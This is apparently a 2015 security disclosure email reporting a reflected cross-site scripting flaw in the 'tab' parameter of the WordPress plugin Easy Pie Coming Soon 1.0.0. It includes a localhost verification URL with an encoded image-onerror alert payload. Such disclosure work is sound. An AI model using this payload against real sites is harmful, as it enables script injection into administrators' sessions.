Subject: Cross-Site Scripting (XSS) in Easy Pie Coming Soon 1.0.0
Date: Mon, 10 Aug 2015 18:22:26 +0200

Hello,

Plugin: Easy Pie Coming Soon 1.0.0 https://wordpress.org/plugins/easy-pie-coming-soon/

1. Cross-Site Scripting (XSS) 

Authenticated administrators can inject html/js code (there is no CSRF protection).

Method: GET
Url: http://localhost/wp-admin/admin.php?page=easy-pie-coming-soon&tab=[xss]
Vulnerable parameter: tab

Example PHP callstack:
/easy-pie-coming-soon/pages/page-options.php:33

Verification:
http://localhost/wp-admin/admin.php?page=easy-pie-coming-soon&tab=%22%3E%3Cimg+src%3Dx+onerror%3Dalert%281%29+%2F%3E

--
Regards,
Marcin Probola,